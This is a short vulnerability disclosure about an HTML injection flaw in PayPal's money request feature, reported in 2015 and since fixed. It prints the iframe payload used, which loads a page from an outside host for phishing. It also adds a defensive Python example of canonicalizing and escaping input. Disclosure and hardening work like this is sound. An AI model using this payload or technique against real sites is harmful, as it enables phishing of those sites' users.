xml encoding for phish

tl;dr: xml encoded iframe payload for phishing. plz see poc.

In December 2015 I found an HTML injection vulnerability in PayPal's money request function.

I used an XML-encoded iframe payload during account registration at PayPal to carry out a phishing attack on the money request.

The xml encoded payload:

<Iframe/src=http://outofctrl.it/a.html Width="640" Height="480"></iframe>

Proof of concept:

Timeline:

  • Dec. 2015: discovered & reported.
  • Feb. 2016: fixed.
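
A defensive illustration of the bug class described above, added here as an example and not taken from the original post or from PayPal's code: a filter that inspects only the raw field value lets entity-encoded markup through, while validating the canonical form and escaping on output does not. The function names, the example.invalid URL and the assumption that the input check looked only at the raw value are all hypothetical.

```python
import html
import re

MAX_ROUNDS = 5  # assumption: cap on nested entity-encoding layers
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z!]")  # start of any tag-like token

# Constructed sample input: entity-encoded markup, once and twice encoded.
SAMPLE = "&lt;iframe src=http://example.invalid/a.html&gt;&lt;/iframe&gt;"
SAMPLE_DOUBLE = SAMPLE.replace("&", "&amp;")


def naive_filter_ok(value: str) -> bool:
    """Weak check: inspects only the raw string, so encoded markup passes."""
    return "<" not in value


def canonicalize(value: str) -> str:
    """Decode character references until the value stops changing."""
    for _ in range(MAX_ROUNDS):
        decoded = html.unescape(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def validate_name(value: str) -> str:
    """Hardened check: validate the canonical form, then store that form."""
    canon = canonicalize(value)
    if TAG_RE.search(canon):
        raise ValueError("markup not allowed in name field")
    return canon


def render_request(name: str) -> str:
    """Escape on output so a stored value can never become markup."""
    return "<p>" + html.escape(name, quote=True) + " sent you a money request</p>"


if __name__ == "__main__":
    for candidate in (SAMPLE, SAMPLE_DOUBLE, "Tom &amp; Jerry"):
        try:
            verdict = "accepted as " + repr(validate_name(candidate))
        except ValueError as exc:
            verdict = "rejected: " + str(exc)
        print(naive_filter_ok(candidate), verdict)
    print(render_request(canonicalize(SAMPLE)))
```

Output escaping in `render_request` is the control that holds even if an input check is bypassed; the input validation only keeps bad data out of storage.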